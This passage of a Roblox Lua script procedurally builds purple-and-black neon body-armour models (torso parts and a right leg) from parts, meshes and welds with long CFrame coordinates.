  2268. w1.C1 = CFrame.new(-65.0029221, -7.60003757, 14.2623367, 1.00000453, -2.08616257e-007, -3.72529385e-008, 1.1920929e-007, 0.999999404, -1.49011452e-008, -6.70552325e-008, 2.9802333e-008, 1.0000037)
  2269. w2 = Instance.new("Weld", p2)
  2270. w2.Name = "Part_Weld"
  2271. w2.Part0 = p2
  2272. w2.C0 = CFrame.new(-65.0029221, -7.60003757, 14.2623367, 1.00000453, -2.08616257e-007, -3.72529385e-008, 1.1920929e-007, 0.999999404, -1.49011452e-008, -6.70552325e-008, 2.9802333e-008, 1.0000037)
  2273. w2.Part1 = p3
  2274. w2.C1 = CFrame.new(-35.8392487, 56.0098076, 20.1084957, 0.491483778, 0.834233105, 0.250000894, -0.868311942, 0.491481245, 0.0669875443, -0.0669877231, -0.249999821, 0.965929389)
  2275. w3 = Instance.new("Weld", p3)
  2276. w3.Name = "Part_Weld"
  2277. w3.Part0 = p3
  2278. w3.C0 = CFrame.new(-35.8392487, 56.0098076, 20.1084957, 0.491483778, 0.834233105, 0.250000894, -0.868311942, 0.491481245, 0.0669875443, -0.0669877231, -0.249999821, 0.965929389)
  2279. w3.Part1 = p4
  2280. w3.C1 = CFrame.new(-52.459343, -38.4935722, 14.2623358, 0.866029263, -0.499999881, -2.48114169e-008, 0.500002384, 0.866024733, -3.15312398e-008, -6.70552325e-008, 2.9802333e-008, 1.0000037)
  2281. w4 = Instance.new("Weld", p4)
  2282. w4.Name = "Part_Weld"
  2283. w4.Part0 = p4
  2284. w4.C0 = CFrame.new(-52.459343, -38.4935722, 14.2623358, 0.866029263, -0.499999881, -2.48114169e-008, 0.500002384, 0.866024733, -3.15312398e-008, -6.70552325e-008, 2.9802333e-008, 1.0000037)
  2285. w4.Part1 = p5
  2286. w4.C1 = CFrame.new(54.4780006, 39.4971619, 14.2623367, -0.866029263, 0.49999994, 2.48113796e-008, -0.500002444, -0.866024733, 3.15312398e-008, -6.70552254e-008, 2.98023224e-008, 1.0000037)
  2287. w5 = Instance.new("Weld", p5)
  2288. w5.Name = "Part_Weld"
  2289. w5.Part0 = p5
  2290. w5.C0 = CFrame.new(54.4780006, 39.4971619, 14.2623367, -0.866029263, 0.49999994, 2.48113796e-008, -0.500002444, -0.866024733, 3.15312398e-008, -6.70552254e-008, 2.98023224e-008, 1.0000037)
  2291. w5.Part1 = p6
  2292. w5.C1 = CFrame.new(60.1191711, -26.5763226, 14.2623367, -0.866029382, -0.499999493, 3.9712539e-008, 0.500002205, -0.866024911, -5.72166936e-009, -6.70552254e-008, 2.98023224e-008, 1.0000037)
  2293. w6 = Instance.new("Weld", p6)
  2294. w6.Name = "Part_Weld"
  2295. w6.Part0 = p6
  2296. w6.C0 = CFrame.new(60.1191711, -26.5763226, 14.2623367, -0.866029382, -0.499999493, 3.9712539e-008, 0.500002205, -0.866024911, -5.72166936e-009, -6.70552254e-008, 2.98023224e-008, 1.0000037)
  2297. w6.Part1 = p7
  2298. w6.C1 = CFrame.new(-68.0026093, -7.20003986, 14.2622881, 1, -1.63912006e-007, 7.4505806e-008, 1.63912006e-007, 1, 1.49011186e-008, -7.4505806e-008, -1.49011061e-008, 1)
  2299. w7 = Instance.new("Weld", p7)
  2300. w7.Name = "Part_Weld"
  2301. w7.Part0 = p7
  2302. w7.C0 = CFrame.new(-68.0026093, -7.20003986, 14.2622881, 1, -1.63912006e-007, 7.4505806e-008, 1.63912006e-007, 1, 1.49011186e-008, -7.4505806e-008, -1.49011061e-008, 1)
  2303. w7.Part1 = p8
  2304. w7.C1 = CFrame.new(-64.4025955, -6.60003376, 14.2622824, 1, -5.96043641e-008, 4.47034836e-008, 5.96043677e-008, 1, -5.9604421e-008, -4.470348e-008, 5.96044245e-008, 1)
  2305. w8 = Instance.new("Weld", p8)
  2306. w8.Name = "Part_Weld"
  2307. w8.Part0 = p8
  2308. w8.C0 = CFrame.new(-64.4025955, -6.60003376, 14.2622824, 1, -5.96043641e-008, 4.47034836e-008, 5.96043677e-008, 1, -5.9604421e-008, -4.470348e-008, 5.96044245e-008, 1)
  2309. w8.Part1 = p9
  2310. w8.C1 = CFrame.new(-67.8026123, -6.50004005, 14.2622881, 1, -1.63912006e-007, 7.4505806e-008, 1.63912006e-007, 1, 1.49011186e-008, -7.4505806e-008, -1.49011061e-008, 1)
  2311. w9 = Instance.new("Weld", p9)
  2312. w9.Name = "Part_Weld"
  2313. w9.Part0 = p9
  2314. w9.C0 = CFrame.new(-67.8026123, -6.50004005, 14.2622881, 1, -1.63912006e-007, 7.4505806e-008, 1.63912006e-007, 1, 1.49011186e-008, -7.4505806e-008, -1.49011061e-008, 1)
  2315. w9.Part1 = p10
  2316. w9.C1 = CFrame.new(19.5072937, 66.0613785, 5.0658741, -0.323143423, 0.912731171, 0.250000954, -0.93463856, -0.349243909, 0.0669875741, 0.148453087, -0.212012053, 0.965929449)
  2317. w10 = Instance.new("Weld", p10)
  2318. w10.Name = "Main_Weld"
  2319. w10.Part0 = p10
  2320. w10.C0 = CFrame.new(19.5072937, 66.0613785, 5.0658741, -0.323143423, 0.912731171, 0.250000954, -0.93463856, -0.349243909, 0.0669875741, 0.148453087, -0.212012053, 0.965929449)
  2321. w10.Part1 = p11
  2322. w10.C1 = CFrame.new(-66.1029282, -6.20003605, 13.1623268, 1.00000453, -2.38418579e-007, -3.72529456e-008, 8.94069672e-008, 0.999999344, -1.49011452e-008, -6.70552396e-008, 2.9802333e-008, 1.0000037)
  2323. w11 = Instance.new("Weld", p11)
  2324. w11.Name = "Part_Weld"
  2325. w11.Part0 = p11
  2326. w11.C0 = CFrame.new(-66.1029282, -6.20003605, 13.1623268, 1.00000453, -2.38418579e-007, -3.72529456e-008, 8.94069672e-008, 0.999999344, -1.49011452e-008, -6.70552396e-008, 2.9802333e-008, 1.0000037)
  2327. w11.Part1 = p12
  2328. w11.C1 = CFrame.new(-66.1026306, -6.20004368, 13.5622816, 1, -1.1920875e-007, 6.70552325e-008, 1.1920875e-007, 1, -2.98022158e-008, -6.70552325e-008, 2.98022229e-008, 1)
  2329. w12 = Instance.new("Weld", p12)
  2330. w12.Name = "Part_Weld"
  2331. w12.Part0 = p12
  2332. w12.C0 = CFrame.new(-66.1026306, -6.20004368, 13.5622816, 1, -1.1920875e-007, 6.70552325e-008, 1.1920875e-007, 1, -2.98022158e-008, -6.70552325e-008, 2.98022229e-008, 1)
  2333. w12.Part1 = p13
  2334. w12.C1 = CFrame.new(-5.82635021, 66.1279221, 12.0623207, 7.54977023e-008, 0.999999344, -1.49011434e-008, -1.00000453, 1.94707212e-007, 3.72529385e-008, -6.70552325e-008, 2.9802333e-008, 1.0000037)
  2335. w13 = Instance.new("Weld", p13)
  2336. w13.Name = "Part_Weld"
  2337. w13.Part0 = p13
  2338. w13.C0 = CFrame.new(-5.82635021, 66.1279221, 12.0623207, 7.54977023e-008, 0.999999344, -1.49011434e-008, -1.00000453, 1.94707212e-007, 3.72529385e-008, -6.70552325e-008, 2.9802333e-008, 1.0000037)
  2339. w13.Part1 = p14
  2340. w13.C1 = CFrame.new(-53.3026466, -37.8329315, 12.0623188, 0.866029263, -0.499999881, -2.4811424e-008, 0.500002325, 0.866024673, -3.15312434e-008, -6.70552396e-008, 2.9802333e-008, 1.0000037)
  2341. w14 = Instance.new("Weld", p14)
  2342. w14.Name = "Part_Weld"
  2343. w14.Part0 = p14
  2344. w14.C0 = CFrame.new(-53.3026466, -37.8329315, 12.0623188, 0.866029263, -0.499999881, -2.4811424e-008, 0.500002325, 0.866024673, -3.15312434e-008, -6.70552396e-008, 2.9802333e-008, 1.0000037)
  2345. w14.Part1 = p15
  2346. w14.C1 = CFrame.new(-61.1476631, 28.2449875, 12.0623198, 0.866029382, 0.499999404, -3.97125675e-008, -0.500002146, 0.866024971, 5.72170222e-009, -6.70552396e-008, 2.9802333e-008, 1.0000037)
  2347. w15 = Instance.new("Weld", p15)
  2348. w15.Name = "Part_Weld"
  2349. w15.Part0 = p15
  2350. w15.C0 = CFrame.new(-61.1476631, 28.2449875, 12.0623198, 0.866029382, 0.499999404, -3.97125675e-008, -0.500002146, 0.866024971, 5.72170222e-009, -6.70552396e-008, 2.9802333e-008, 1.0000037)
  2351. w15.Part1 = p16
  2352. w15.C1 = CFrame.new(-57.1000977, -32.4815826, 14.2622862, 0.906307578, -0.422618747, 6.51076419e-008, 0.422618747, 0.906307578, 3.17729842e-009, -6.0350331e-008, 2.46360994e-008, 1)
  2353. w16 = Instance.new("Weld", p16)
  2354. w16.Name = "Part_Weld"
  2355. w16.Part0 = p16
  2356. w16.C0 = CFrame.new(-57.1000977, -32.4815826, 14.2622862, 0.906307578, -0.422618747, 6.51076419e-008, 0.422618747, 0.906307578, 3.17729842e-009, -6.0350331e-008, 2.46360994e-008, 1)
  2357. w16.Part1 = p17
  2358. w16.C1 = CFrame.new(-60.6646385, 29.1315918, 14.2623339, 0.866029501, 0.499999583, 5.5611892e-008, -0.500002265, 0.866025209, 3.67179815e-008, -4.470348e-008, 5.96046448e-008, 1.0000037)
  2359. w17 = Instance.new("Weld", p17)
  2360. w17.Name = "Part_Weld"
  2361. w17.Part0 = p17
  2362. w17.C0 = CFrame.new(-60.6646385, 29.1315918, 14.2623339, 0.866029501, 0.499999583, 5.5611892e-008, -0.500002265, 0.866025209, 3.67179815e-008, -4.470348e-008, 5.96046448e-008, 1.0000037)
  2363. w17.Part1 = p18
  2364. w17.C1 = CFrame.new(42.8147545, 49.9616852, 14.2623405, -0.707109571, 0.707106829, 2.10734417e-008, -0.707110047, -0.707106233, -6.32202557e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2365. w18 = Instance.new("Weld", p18)
  2366. w18.Name = "Part_Weld"
  2367. w18.Part0 = p18
  2368. w18.C0 = CFrame.new(42.8147545, 49.9616852, 14.2623405, -0.707109571, 0.707106829, 2.10734417e-008, -0.707110047, -0.707106233, -6.32202557e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2369. w18.Part1 = p19
  2370. w18.C1 = CFrame.new(-65.2028809, -4.70003223, 14.2623415, 1.00000429, -2.08616257e-007, 2.98023117e-008, 8.94069672e-008, 0.999999642, 5.96046377e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2371. w19 = Instance.new("Weld", p19)
  2372. w19.Name = "Part_Weld"
  2373. w19.Part0 = p19
  2374. w19.C0 = CFrame.new(-65.2028809, -4.70003223, 14.2623415, 1.00000429, -2.08616257e-007, 2.98023117e-008, 8.94069672e-008, 0.999999642, 5.96046377e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2375. w19.Part1 = p20
  2376. w19.C1 = CFrame.new(-66.7028656, -4.50003386, 14.2623415, 1.00000417, -2.08616257e-007, 2.98023117e-008, 8.94069672e-008, 0.999999583, 5.96046377e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2377. w20 = Instance.new("Weld", p20)
  2378. w20.Name = "Part_Weld"
  2379. w20.Part0 = p20
  2380. w20.C0 = CFrame.new(-66.7028656, -4.50003386, 14.2623415, 1.00000417, -2.08616257e-007, 2.98023117e-008, 8.94069672e-008, 0.999999583, 5.96046377e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2381. w20.Part1 = p21
  2382. w20.C1 = CFrame.new(-21.6081295, 63.6283798, 14.2623405, 0.258820146, 0.965925455, 6.52870682e-008, -0.965930045, 0.258819073, -1.33600135e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2383. w21 = Instance.new("Weld", p21)
  2384. w21.Name = "Part_Weld"
  2385. w21.Part0 = p21
  2386. w21.C0 = CFrame.new(-21.6081295, 63.6283798, 14.2623405, 0.258820146, 0.965925455, 6.52870682e-008, -0.965930045, 0.258819073, -1.33600135e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2387. w21.Part1 = p22
  2388. w21.C1 = CFrame.new(-67.5028763, -4.30003405, 14.2623415, 1.00000417, -2.08616257e-007, 2.98023117e-008, 8.94069672e-008, 0.999999583, 5.96046377e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2389. w22 = Instance.new("Weld", p22)
  2390. w22.Name = "Wedge_Weld"
  2391. w22.Part0 = p22
  2392. w22.C0 = CFrame.new(-67.5028763, -4.30003405, 14.2623415, 1.00000417, -2.08616257e-007, 2.98023117e-008, 8.94069672e-008, 0.999999583, 5.96046377e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2393. m.Parent = torso
  2394. m:MakeJoints()
  2395. ----------------------------------------------------
  2396. local cor5 = Instance.new("Part", torso.Torso)
  2397. cor5.Name = "Thingy"
  2398. cor5.Locked = true
  2399. cor5.BottomSurface = 0
  2400. cor5.CanCollide = false
  2401. cor5.Size = Vector3.new(2, 1, 1)
  2402. cor5.Transparency = 1
  2403. cor5.TopSurface = 0
  2404. corw2 = Instance.new("Weld", cor5)
  2405. corw2.Part0 = torso
  2406. corw2.Part1 = cor5
  2407. corw2.C0 = CFrame.new(0, 0, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(0))
  2408. corw2.C1 = CFrame.new(0, 0, 0)
  2409. weld2 = Instance.new("Weld", torso.Torso)
  2410. weld2.Part0 = cor5
  2411. weld2.Part1 = p11
  2412. weld2.C0 = CFrame.new(0, 0, 0)
  2413. ----------------------------------------------------
  2414. local m = Instance.new("Model")
  2415. m.Name = "RightLeg"
  2416. p1 = Instance.new("Part", m)
  2417. p1.BrickColor = BrickColor.new("Really black")
  2418. p1.Material = Enum.Material.Neon
  2419. p1.FormFactor = Enum.FormFactor.Custom
  2420. p1.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  2421. p1.CFrame = CFrame.new(67.2429962, 5.49923229, -14.269578, 1.00045943, -5.51538596e-006, -2.14306033e-006, -7.25689733e-006, 0.999951601, 3.93318305e-006, -2.55180248e-006, 4.05587616e-006, 1.00038624)
  2422. p1.CanCollide = false
  2423. p1.Locked = true
  2424. p1.BottomSurface = Enum.SurfaceType.Smooth
  2425. p1.TopSurface = Enum.SurfaceType.Smooth
  2426. b1 = Instance.new("SpecialMesh", p1)
  2427. b1.MeshType = Enum.MeshType.Sphere
  2428. b1.Name = "Mesh"
  2429. p2 = Instance.new("Part", m)
  2430. p2.BrickColor = BrickColor.new("Really black")
  2431. p2.Material = Enum.Material.Neon
  2432. p2.FormFactor = Enum.FormFactor.Custom
  2433. p2.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  2434. p2.CFrame = CFrame.new(67.6437836, 4.79925013, -14.2696915, 1.00046372, -5.51538369e-006, -2.14306829e-006, -7.37613163e-006, 0.999951243, 3.93319806e-006, -2.57999613e-006, 4.14531632e-006, 1.00039005)
  2435. p2.CanCollide = false
  2436. p2.Locked = true
  2437. p2.BottomSurface = Enum.SurfaceType.Smooth
  2438. p2.TopSurface = Enum.SurfaceType.Smooth
  2439. b2 = Instance.new("SpecialMesh", p2)
  2440. b2.MeshType = Enum.MeshType.Sphere
  2441. b2.Name = "Mesh"
  2442. p3 = Instance.new("Part", m)
  2443. p3.BrickColor = BrickColor.new("Royal purple")
  2444. p3.Material = Enum.Material.Neon
  2445. p3.FormFactor = Enum.FormFactor.Custom
  2446. p3.Size = Vector3.new(0.200000048, 0.999999762, 0.200000048)
  2447. p3.CFrame = CFrame.new(66.8881302, 5.17327356, -14.2696877, -0.707441688, -0.707433701, -2.14858301e-006, 0.707077265, -0.707066894, 4.0476084e-006, 4.7538756e-006, -1.07312485e-006, 1.00039387)
  2448. p3.CanCollide = false
  2449. p3.Locked = true
  2450. p3.BottomSurface = Enum.SurfaceType.Smooth
  2451. p3.TopSurface = Enum.SurfaceType.Smooth
  2452. p4 = Instance.new("Part", m)
  2453. p4.BrickColor = BrickColor.new("Really black")
  2454. p4.Material = Enum.Material.Neon
  2455. p4.FormFactor = Enum.FormFactor.Custom
  2456. p4.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  2457. p4.CFrame = CFrame.new(66.5432739, 4.7992568, -14.2696896, 1.00046802, -5.54323196e-006, -2.17126149e-006, -7.42077827e-006, 0.999950886, 4.02261594e-006, -2.58000705e-006, 4.14531496e-006, 1.00039387)
  2458. p4.CanCollide = false
  2459. p4.Locked = true
  2460. p4.BottomSurface = Enum.SurfaceType.Smooth
  2461. p4.TopSurface = Enum.SurfaceType.Smooth
  2462. b3 = Instance.new("SpecialMesh", p4)
  2463. b3.MeshType = Enum.MeshType.Sphere
  2464. b3.Name = "Mesh"
  2465. p5 = Instance.new("Part", m)
  2466. p5.BrickColor = BrickColor.new("Royal purple")
  2467. p5.Material = Enum.Material.Neon
  2468. p5.FormFactor = Enum.FormFactor.Custom
  2469. p5.Size = Vector3.new(0.200000048, 0.999999762, 0.200000048)
  2470. p5.CFrame = CFrame.new(67.8495178, 4.41932487, -14.269804, -0.906733274, 0.422823101, -2.17126944e-006, -0.422590762, -0.906265974, 4.0226314e-006, 5.74146384e-007, -4.94026517e-006, 1.00039768)
  2471. p5.CanCollide = false
  2472. p5.Locked = true
  2473. p5.BottomSurface = Enum.SurfaceType.Smooth
  2474. p5.TopSurface = Enum.SurfaceType.Smooth
  2475. p6 = Instance.new("Part", m)
  2476. p6.BrickColor = BrickColor.new("Royal purple")
  2477. p6.Material = Enum.Material.Neon
  2478. p6.FormFactor = Enum.FormFactor.Custom
  2479. p6.Size = Vector3.new(0.200000048, 0.799999833, 0.200000048)
  2480. p6.CFrame = CFrame.new(66.5438004, 4.21363878, -14.2698011, 1.00047636, -7.68899918e-006, -2.17678416e-006, -5.51342964e-006, 0.999950111, 4.13704174e-006, -2.63088032e-006, 4.20975539e-006, 1.0004015)
  2481. p6.CanCollide = false
  2482. p6.Locked = true
  2483. p6.BottomSurface = Enum.SurfaceType.Smooth
  2484. p6.TopSurface = Enum.SurfaceType.Smooth
  2485. p7 = Instance.new("Part", m)
  2486. p7.BrickColor = BrickColor.new("Really black")
  2487. p7.Material = Enum.Material.Metal
  2488. p7.Name = "Main"
  2489. p7.FormFactor = Enum.FormFactor.Custom
  2490. p7.Size = Vector3.new(2.20000005, 4.19999981, 2.20000005)
  2491. p7.CFrame = CFrame.new(67.2447891, 3.99926972, -13.1694622, 1.00048089, -5.69129634e-006, -2.186149e-006, -7.65911773e-006, 0.999949753, 4.1418657e-006, -2.63640663e-006, 4.32419529e-006, 1.00040531)
  2492. p7.CanCollide = false
  2493. p7.Locked = true
  2494. p7.BottomSurface = Enum.SurfaceType.Smooth
  2495. p7.TopSurface = Enum.SurfaceType.Smooth
  2496. p8 = Instance.new("Part", m)
  2497. p8.BrickColor = BrickColor.new("Royal purple")
  2498. p8.Material = Enum.Material.Neon
  2499. p8.FormFactor = Enum.FormFactor.Custom
  2500. p8.Size = Vector3.new(0.200000048, 1.49999976, 0.200000048)
  2501. p8.CFrame = CFrame.new(67.1560593, 4.19274044, -14.2700233, -0.766423643, -0.643097878, -2.21435107e-006, 0.642760634, -0.766000509, 4.23129995e-006, 4.88720252e-006, -1.69966381e-006, 1.00041294)
  2502. p8.CanCollide = false
  2503. p8.Locked = true
  2504. p8.BottomSurface = Enum.SurfaceType.Smooth
  2505. p8.TopSurface = Enum.SurfaceType.Smooth
  2506. p9 = Instance.new("WedgePart", m)
  2507. p9.BrickColor = BrickColor.new("Royal purple")
  2508. p9.Material = Enum.Material.Neon
  2509. p9.Name = "Wedge"
  2510. p9.FormFactor = Enum.FormFactor.Custom
  2511. p9.Size = Vector3.new(1, 1.19999981, 4)
  2512. p9.CFrame = CFrame.new(67.3460693, 3.49928832, -10.7686377, -1.00049889, -4.27957411e-006, 4.5400966e-006, 8.07642937e-006, 0.906259179, -0.422600418, 2.61850914e-006, -0.422791958, -0.906690836)
  2513. p9.CanCollide = false
  2514. p9.Locked = true
  2515. p9.TopSurface = Enum.SurfaceType.Smooth
  2516. b4 = Instance.new("SpecialMesh", p9)
  2517. b4.MeshType = Enum.MeshType.Wedge
  2518. b4.Name = "Mesh"
  2519. b4.Scale = Vector3.new(0.600000024, 1, 1)
  2520. p10 = Instance.new("Part", m)
  2521. p10.BrickColor = BrickColor.new("Really black")
  2522. p10.Material = Enum.Material.Neon
  2523. p10.FormFactor = Enum.FormFactor.Custom
  2524. p10.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  2525. p10.CFrame = CFrame.new(68.0469971, 3.99923301, -14.2702446, 1.00050783, -6.09550762e-006, -2.27330474e-006, -8.07715332e-006, 0.999947786, 4.38094139e-006, -2.69438578e-006, 4.64916229e-006, 1.0004282)
  2526. p10.CanCollide = false
  2527. p10.Locked = true
  2528. p10.BottomSurface = Enum.SurfaceType.Smooth
  2529. p10.TopSurface = Enum.SurfaceType.Smooth
  2530. b5 = Instance.new("SpecialMesh", p10)
  2531. b5.MeshType = Enum.MeshType.Sphere
  2532. b5.Name = "Mesh"
  2533. p11 = Instance.new("Part", m)
  2534. p11.BrickColor = BrickColor.new("Really black")
  2535. p11.Material = Enum.Material.Neon
  2536. p11.FormFactor = Enum.FormFactor.Custom
  2537. p11.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  2538. p11.CFrame = CFrame.new(66.5467682, 3.59925723, -14.2703533, 1.00051641, -6.21477238e-006, -2.30150818e-006, -8.22622587e-006, 0.999947011, 4.47037792e-006, -2.72259308e-006, 4.73860473e-006, 1.00043583)
  2539. p11.CanCollide = false
  2540. p11.Locked = true
  2541. p11.BottomSurface = Enum.SurfaceType.Smooth
  2542. p11.TopSurface = Enum.SurfaceType.Smooth
  2543. b6 = Instance.new("SpecialMesh", p11)
  2544. b6.MeshType = Enum.MeshType.Sphere
  2545. b6.Name = "Mesh"
  2546. p12 = Instance.new("Part", m)
  2547. p12.BrickColor = BrickColor.new("Royal purple")
  2548. p12.Material = Enum.Material.Neon
  2549. p12.FormFactor = Enum.FormFactor.Custom
  2550. p12.Size = Vector3.new(0.200000048, 1.49999976, 0.200000048)
  2551. p12.CFrame = CFrame.new(67.558609, 3.39274073, -14.2704687, -0.766450763, -0.643119991, -2.33134415e-006, 0.642759323, -0.765998006, 4.5598149e-006, 5.20550884e-006, -1.92419975e-006, 1.00044346)
  2552. p12.CanCollide = false
  2553. p12.Locked = true
  2554. p12.BottomSurface = Enum.SurfaceType.Smooth
  2555. p12.TopSurface = Enum.SurfaceType.Smooth
  2556. p13 = Instance.new("Part", m)
  2557. p13.BrickColor = BrickColor.new("Really black")
  2558. p13.Material = Enum.Material.Neon
  2559. p13.FormFactor = Enum.FormFactor.Custom
  2560. p13.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  2561. p13.CFrame = CFrame.new(67.0482101, 2.79927826, -14.2705812, 1.00053358, -6.43730164e-006, -2.36118058e-006, -8.5234642e-006, 0.999945402, 4.64126742e-006, -2.78064022e-006, 4.90151251e-006, 1.00045109)
  2562. p13.CanCollide = false
  2563. p13.Locked = true
  2564. p13.BottomSurface = Enum.SurfaceType.Smooth
  2565. p13.TopSurface = Enum.SurfaceType.Smooth
  2566. b7 = Instance.new("SpecialMesh", p13)
  2567. b7.MeshType = Enum.MeshType.Sphere
  2568. b7.Name = "Mesh"
  2569. p14 = Instance.new("WedgePart", m)
  2570. p14.BrickColor = BrickColor.new("Royal purple")
  2571. p14.Material = Enum.Material.Neon
  2572. p14.Name = "Wedge"
  2573. p14.FormFactor = Enum.FormFactor.Custom
  2574. p14.Size = Vector3.new(1, 0.699999809, 1.29999995)
  2575. p14.CFrame = CFrame.new(66.8462448, 2.3492887, -14.7586241, 1.00054216, -6.55656913e-006, -2.38459074e-006, -8.61293847e-006, 0.999944568, 4.66311894e-006, -2.81690609e-006, 5.04259924e-006, 1.00045872)
  2576. p14.CanCollide = false
  2577. p14.Locked = true
  2578. p14.TopSurface = Enum.SurfaceType.Smooth
  2579. b8 = Instance.new("SpecialMesh", p14)
  2580. b8.MeshType = Enum.MeshType.Wedge
  2581. b8.Name = "Mesh"
  2582. b8.Scale = Vector3.new(0.200000003, 1, 1)
  2583. p15 = Instance.new("WedgePart", m)
  2584. p15.BrickColor = BrickColor.new("Royal purple")
  2585. p15.Material = Enum.Material.Neon
  2586. p15.Name = "Wedge"
  2587. p15.FormFactor = Enum.FormFactor.Custom
  2588. p15.Size = Vector3.new(1, 0.699999809, 1.29999995)
  2589. p15.CFrame = CFrame.new(68.0474777, 2.34926867, -14.7587423, 1.00055075, -6.67583618e-006, -2.41442808e-006, -8.73221416e-006, 0.999943614, 4.74457238e-006, -2.84674707e-006, 5.12405404e-006, 1.00046635)
  2590. p15.CanCollide = false
  2591. p15.Locked = true
  2592. p15.TopSurface = Enum.SurfaceType.Smooth
  2593. b9 = Instance.new("SpecialMesh", p15)
  2594. b9.MeshType = Enum.MeshType.Wedge
  2595. b9.Name = "Mesh"
  2596. b9.Scale = Vector3.new(0.200000003, 1, 1)
  2597. p16 = Instance.new("WedgePart", m)
  2598. p16.BrickColor = BrickColor.new("Royal purple")
  2599. p16.Material = Enum.Material.Neon
  2600. p16.Name = "Wedge"
  2601. p16.FormFactor = Enum.FormFactor.Custom
  2602. p16.Size = Vector3.new(1, 0.699999809, 1.29999995)
  2603. p16.CFrame = CFrame.new(67.4477234, 2.34926438, -14.7588549, 1.00055933, -6.79510413e-006, -2.44426587e-006, -8.85149075e-006, 0.99994266, 4.82602672e-006, -2.8765885e-006, 5.20550975e-006, 1.00047398)
  2604. p16.CanCollide = false
  2605. p16.Locked = true
  2606. p16.TopSurface = Enum.SurfaceType.Smooth
  2607. b10 = Instance.new("SpecialMesh", p16)
  2608. b10.MeshType = Enum.MeshType.Wedge
  2609. b10.Name = "Mesh"
  2610. b10.Scale = Vector3.new(0.200000003, 1, 1)
  2611. w1 = Instance.new("Weld", p1)
  2612. w1.Name = "Part_Weld"
  2613. w1.Part0 = p1
  2614. w1.C0 = CFrame.new(-67.2025909, -3.50003719, 14.2622871, 1, -8.94065977e-008, 5.79734944e-008, 8.94065977e-008, 1, -2.98022034e-008, -5.79734909e-008, 2.98022087e-008, 1)
  2615. w1.Part1 = p2
  2616. w1.C1 = CFrame.new(-67.6028976, -2.80003333, 14.2623405, 1.00000429, -2.08616257e-007, 2.98023117e-008, 8.94069672e-008, 0.999999642, 5.96046377e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2617. w2 = Instance.new("Weld", p2)
  2618. w2.Name = "Part_Weld"
  2619. w2.Part0 = p2
  2620. w2.C0 = CFrame.new(-67.6028976, -2.80003333, 14.2623405, 1.00000429, -2.08616257e-007, 2.98023117e-008, 8.94069672e-008, 0.999999642, 5.96046377e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2621. w2.Part1 = p3
  2622. w2.C1 = CFrame.new(45.023777, 49.5125847, 14.2622843, -0.707106769, 0.707106769, -6.37114681e-008, -0.707106769, -0.707106769, 1.37820813e-008, -3.53054119e-008, 5.47962173e-008, 1)
  2623. w3 = Instance.new("Weld", p3)
  2624. w3.Name = "Part_Weld"
  2625. w3.Part0 = p3
  2626. w3.C0 = CFrame.new(45.023777, 49.5125847, 14.2622843, -0.707106769, 0.707106769, -6.37114681e-008, -0.707106769, -0.707106769, 1.37820813e-008, -3.53054119e-008, 5.47962173e-008, 1)
  2627. w3.Part1 = p4
  2628. w3.C1 = CFrame.new(-66.5026016, -2.80003667, 14.2622871, 1, -8.94065835e-008, 5.79734944e-008, 8.94065835e-008, 1, -2.98022034e-008, -5.79734909e-008, 2.98022087e-008, 1)
  2629. w4 = Instance.new("Weld", p4)
  2630. w4.Name = "Part_Weld"
  2631. w4.Part0 = p4
  2632. w4.C0 = CFrame.new(-66.5026016, -2.80003667, 14.2622871, 1, -8.94065835e-008, 5.79734944e-008, 8.94065835e-008, 1, -2.98022034e-008, -5.79734909e-008, 2.98022087e-008, 1)
  2633. w4.Part1 = p5
  2634. w4.C1 = CFrame.new(62.4776497, -26.4635353, 14.2623405, -0.906311512, -0.422618151, -5.2200086e-008, 0.422620177, -0.906307399, -4.14251318e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2635. w5 = Instance.new("Weld", p5)
  2636. w5.Name = "Part_Weld"
  2637. w5.Part0 = p5
  2638. w5.C0 = CFrame.new(62.4776497, -26.4635353, 14.2623405, -0.906311512, -0.422618151, -5.2200086e-008, 0.422620177, -0.906307399, -4.14251318e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2639. w5.Part1 = p6
  2640. w5.C1 = CFrame.new(-66.5025787, -2.21426678, 14.2622843, 1, 1.90734295e-006, 3.53052521e-008, -1.90734295e-006, 1, -5.47961676e-008, -3.53053551e-008, 5.47961001e-008, 1)
  2641. w6 = Instance.new("Weld", p6)
  2642. w6.Name = "Part_Weld"
  2643. w6.Part0 = p6
  2644. w6.C0 = CFrame.new(-66.5025787, -2.21426678, 14.2622843, 1, 1.90734295e-006, 3.53052521e-008, -1.90734295e-006, 1, -5.47961676e-008, -3.53053551e-008, 5.47961001e-008, 1)
  2645. w6.Part1 = p7
  2646. w6.C1 = CFrame.new(-67.202919, -2.00003123, 13.1623335, 1.00000453, -2.38418579e-007, 2.98023295e-008, 8.94069672e-008, 0.999999642, 5.96046448e-008, -4.46573551e-008, 5.96046448e-008, 1.00000381)
  2647. w7 = Instance.new("Weld", p7)
  2648. w7.Name = "Part_Weld"
  2649. w7.Part0 = p7
  2650. w7.C0 = CFrame.new(-67.202919, -2.00003123, 13.1623335, 1.00000453, -2.38418579e-007, 2.98023295e-008, 8.94069672e-008, 0.999999642, 5.96046448e-008, -4.46573551e-008, 5.96046448e-008, 1.00000381)
  2651. w7.Part1 = p8
